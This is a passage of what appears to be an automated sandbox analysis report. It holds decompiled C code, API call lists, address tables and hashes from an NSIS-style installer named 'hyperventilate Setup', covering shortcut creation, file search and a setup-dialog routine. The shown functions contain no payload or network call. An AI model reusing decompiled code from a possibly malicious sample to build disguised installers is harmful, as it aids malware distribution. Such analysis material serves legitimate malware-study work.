                                                                                                                              0x00405d1b
                                                                                                                              0x00405cd4
                                                                                                                              0x00405cd7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405ce6
                                                                                                                              0x00405ce8
                                                                                                                              0x00405cea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405cea
                                                                                                                              0x00000000
                                                                                                                              0x00405d20
                                                                                                                              0x00405cab
                                                                                                                              0x00000000
                                                                                                                              0x00405c69
                                                                                                                              0x00405c6e
                                                                                                                              0x00405c84
                                                                                                                              0x00405c89
                                                                                                                              0x00405c8c
                                                                                                                              0x00405d29
                                                                                                                              0x00405d29
                                                                                                                              0x00405d2d
                                                                                                                              0x00405d35
                                                                                                                              0x00405d35
                                                                                                                              0x00000000
                                                                                                                              0x00405d2d
                                                                                                                              0x00405c96
                                                                                                                              0x00405d24
                                                                                                                              0x00405d24
                                                                                                                              0x00405d27
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405d27
                                                                                                                              0x00405c67
                                                                                                                              0x00405c3a
                                                                                                                              0x00405c3e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405c40
                                                                                                                              0x00405c44
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405c46
                                                                                                                              0x00405c4a
                                                                                                                              0x00000000
                                                                                                                              0x00405c4c
                                                                                                                              0x00405c4c
                                                                                                                              0x00000000
                                                                                                                              0x00405c4c
                                                                                                                              0x00405c4a
                                                                                                                              0x00405daf
                                                                                                                              0x00405db9
                                                                                                                              0x00405dc5
                                                                                                                              0x00405dc5
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GetVersion.KERNEL32(00000000,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                                              • lstrlenA.KERNEL32(Call,00000000,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                              • API String ID: 900638850-1230650788
                                                                                                                              • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                                              • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                                              • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                                              • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                                              0x00402029
                                                                                                                              0x00402033
                                                                                                                              0x0040203c
                                                                                                                              0x00402046
                                                                                                                              0x0040204f
                                                                                                                              0x00402059
                                                                                                                              0x0040205d
                                                                                                                              0x0040205d
                                                                                                                              0x00402062
                                                                                                                              0x00402073
                                                                                                                              0x0040207b
                                                                                                                              0x0040215b
                                                                                                                              0x0040215b
                                                                                                                              0x00402162
                                                                                                                              0x00402081
                                                                                                                              0x00402081
                                                                                                                              0x00402092
                                                                                                                              0x00402096
                                                                                                                              0x0040209c
                                                                                                                              0x004020a6
                                                                                                                              0x004020a8
                                                                                                                              0x004020b3
                                                                                                                              0x004020b6
                                                                                                                              0x004020c3
                                                                                                                              0x004020c5
                                                                                                                              0x004020c7
                                                                                                                              0x004020ce
                                                                                                                              0x004020d1
                                                                                                                              0x004020d1
                                                                                                                              0x004020d4
                                                                                                                              0x004020de
                                                                                                                              0x004020e6
                                                                                                                              0x004020eb
                                                                                                                              0x004020f7
                                                                                                                              0x004020f7
                                                                                                                              0x004020fa
                                                                                                                              0x00402103
                                                                                                                              0x00402106
                                                                                                                              0x0040210f
                                                                                                                              0x00402114
                                                                                                                              0x00402126
                                                                                                                              0x00402135
                                                                                                                              0x00402137
                                                                                                                              0x00402143
                                                                                                                              0x00402143
                                                                                                                              0x00402135
                                                                                                                              0x00402145
                                                                                                                              0x0040214b
                                                                                                                              0x0040214b
                                                                                                                              0x0040214e
                                                                                                                              0x00402154
                                                                                                                              0x00402159
                                                                                                                              0x0040216e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402159
                                                                                                                              0x00402164
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                              • API String ID: 123533781-501415292
                                                                                                                              • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                                              • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                                              • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                                              • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                              0x00402656
                                                                                                                              0x0040266a
                                                                                                                              0x00402675
                                                                                                                              0x00402676
                                                                                                                              0x004027b1
                                                                                                                              0x00402658
                                                                                                                              0x00402658
                                                                                                                              0x0040265a
                                                                                                                              0x0040265c
                                                                                                                              0x0040265c
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFindFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1974802433-0
                                                                                                                              • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                                              • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                                              • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                                              • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403A45, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091c4 - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, "hyperventilate Setup");
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x20
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x4214a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                                                              0x00403a4e
                                                                                                                              0x00403a57
                                                                                                                              0x00403b98
                                                                                                                              0x00403b9c
                                                                                                                              0x00403ba0
                                                                                                                              0x00403ba2
                                                                                                                              0x00403ba7
                                                                                                                              0x00403bb2
                                                                                                                              0x00403bbd
                                                                                                                              0x00403bc2
                                                                                                                              0x00403bc4
                                                                                                                              0x00403bc6
                                                                                                                              0x00403bc9
                                                                                                                              0x00403bce
                                                                                                                              0x00403bdc
                                                                                                                              0x00403be9
                                                                                                                              0x00403bf0
                                                                                                                              0x00403bf0
                                                                                                                              0x00403bf1
                                                                                                                              0x00403bf1
                                                                                                                              0x00403bf6
                                                                                                                              0x00403bfc
                                                                                                                              0x00403c03
                                                                                                                              0x00403c09
                                                                                                                              0x00403c0b
                                                                                                                              0x00403c4b
                                                                                                                              0x00403c50
                                                                                                                              0x00403c55
                                                                                                                              0x00403c55
                                                                                                                              0x00403c5a
                                                                                                                              0x00403c63
                                                                                                                              0x00403c65
                                                                                                                              0x00403c6a
                                                                                                                              0x00403c70
                                                                                                                              0x00403c74
                                                                                                                              0x00403c74
                                                                                                                              0x00403c79
                                                                                                                              0x00403c7f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403c85
                                                                                                                              0x00403c8a
                                                                                                                              0x00403c90
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403c99
                                                                                                                              0x00403ca1
                                                                                                                              0x00403ca6
                                                                                                                              0x00403ca9
                                                                                                                              0x00403caf
                                                                                                                              0x00403cb4
                                                                                                                              0x00403cb7
                                                                                                                              0x00403cbd
                                                                                                                              0x00403cc2
                                                                                                                              0x00403cc5
                                                                                                                              0x00403ccb
                                                                                                                              0x00403cd3
                                                                                                                              0x00403cd9
                                                                                                                              0x00403cdf
                                                                                                                              0x00403ce3
                                                                                                                              0x00403cea
                                                                                                                              0x00403cea
                                                                                                                              0x00403cea
                                                                                                                              0x00403cf4
                                                                                                                              0x00403d06
                                                                                                                              0x00403d12
                                                                                                                              0x00403d17
                                                                                                                              0x00403d21
                                                                                                                              0x00403d27
                                                                                                                              0x00403d29
                                                                                                                              0x00403d2e
                                                                                                                              0x00403d2b
                                                                                                                              0x00403d2b
                                                                                                                              0x00403d2b
                                                                                                                              0x00403d3e
                                                                                                                              0x00403d56
                                                                                                                              0x00403d58
                                                                                                                              0x00403d5e
                                                                                                                              0x00403d73
                                                                                                                              0x00403d60
                                                                                                                              0x00403d69
                                                                                                                              0x00403d6b
                                                                                                                              0x00403d6b
                                                                                                                              0x00403d79
                                                                                                                              0x00403d89
                                                                                                                              0x00403d9a
                                                                                                                              0x00403da1
                                                                                                                              0x00403da7
                                                                                                                              0x00403dab
                                                                                                                              0x00403db0
                                                                                                                              0x00403db2
                                                                                                                              0x00000000
                                                                                                                              0x00403db8
                                                                                                                              0x00403db8
                                                                                                                              0x00403dba
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403dc0
                                                                                                                              0x00403dc4
                                                                                                                              0x00403de9
                                                                                                                              0x00403def
                                                                                                                              0x00403df5
                                                                                                                              0x00403df7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403e1d
                                                                                                                              0x00403e23
                                                                                                                              0x00403e25
                                                                                                                              0x00403e2a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403e30
                                                                                                                              0x00403e33
                                                                                                                              0x00403e36
                                                                                                                              0x00403e4d
                                                                                                                              0x00403e59
                                                                                                                              0x00403e72
                                                                                                                              0x00403e78
                                                                                                                              0x00403e7c
                                                                                                                              0x00403e81
                                                                                                                              0x00403e87
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403e91
                                                                                                                              0x00403e9c
                                                                                                                              0x00000000
                                                                                                                              0x00403e9c
                                                                                                                              0x00403dc6
                                                                                                                              0x00403dcc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403dd2
                                                                                                                              0x00403dd8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403dde
                                                                                                                              0x00403db2
                                                                                                                              0x00403ea9
                                                                                                                              0x00403eb5
                                                                                                                              0x00403ebc
                                                                                                                              0x00000000
                                                                                                                              0x00403c0d
                                                                                                                              0x00403c0d
                                                                                                                              0x00403c10
                                                                                                                              0x00403c43
                                                                                                                              0x00403c43
                                                                                                                              0x00403c45
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403c45
                                                                                                                              0x00403c12
                                                                                                                              0x00403c16
                                                                                                                              0x00403c1b
                                                                                                                              0x00403c1d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403c2d
                                                                                                                              0x00403c35
                                                                                                                              0x00000000
                                                                                                                              0x00403c3b
                                                                                                                              0x00403a69
                                                                                                                              0x00403a69
                                                                                                                              0x00403a6d
                                                                                                                              0x00403a72
                                                                                                                              0x00403a81
                                                                                                                              0x00403a81
                                                                                                                              0x00403a8a
                                                                                                                              0x00403a93
                                                                                                                              0x00403a9e
                                                                                                                              0x00403a9e
                                                                                                                              0x00403aaa
                                                                                                                              0x00403ac6
                                                                                                                              0x00403ac9
                                                                                                                              0x00403adc
                                                                                                                              0x00403ae2
                                                                                                                              0x00403b85
                                                                                                                              0x00000000
                                                                                                                              0x00403b8e
                                                                                                                              0x00403ae8
                                                                                                                              0x00403af5
                                                                                                                              0x00403af7
                                                                                                                              0x00403af9
                                                                                                                              0x00403b18
                                                                                                                              0x00403b18
                                                                                                                              0x00403b1b
                                                                                                                              0x00403b20
                                                                                                                              0x00403b23
                                                                                                                              0x00403b33
                                                                                                                              0x00403b34
                                                                                                                              0x00403b36
                                                                                                                              0x00403b6c
                                                                                                                              0x00403b7f
                                                                                                                              0x00000000
                                                                                                                              0x00403b7f
                                                                                                                              0x00403b38
                                                                                                                              0x00403b3e
                                                                                                                              0x00403b57
                                                                                                                              0x00403b5c
                                                                                                                              0x00403b5e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403b60
                                                                                                                              0x00403b4c
                                                                                                                              0x00403b4c
                                                                                                                              0x00403b4e
                                                                                                                              0x00403b4e
                                                                                                                              0x00000000
                                                                                                                              0x00403b4e
                                                                                                                              0x00403b41
                                                                                                                              0x00403b46
                                                                                                                              0x00000000
                                                                                                                              0x00403b46
